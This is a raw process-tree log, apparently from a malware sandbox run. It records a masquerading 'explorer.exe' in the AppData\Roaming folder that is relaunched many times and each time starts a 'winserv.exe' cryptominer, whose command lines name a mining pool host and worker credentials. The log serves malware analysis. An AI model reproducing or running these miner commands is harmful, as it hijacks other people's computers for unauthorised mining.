-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3844
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2960
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4616
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2576
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5000
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3428
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4836
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1100
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:744
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4924
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2976
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3628
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4756
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3184
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4208
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5092
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3984
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4072
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4700
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2788
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3344
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1544
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2176
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4428
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4088
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3416
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3632
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:948
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3288
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3160
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1772
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2960
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1328
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4684
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2500
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3940
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2860
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4148
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3780
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2400
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2828
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:808
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2596
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4700
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3524
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:404
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2860
-
-
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2700
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2368
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3708
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2216
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:768
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3444
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1800
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3676
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2096
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3208
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:744
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1856
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1640
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3980
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1728
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2412
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3636
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4348
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2472
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1100
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2652
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3192
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5072
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:552
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:920
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3772
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3096
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:636
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5096
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1952
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1812
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4844
-
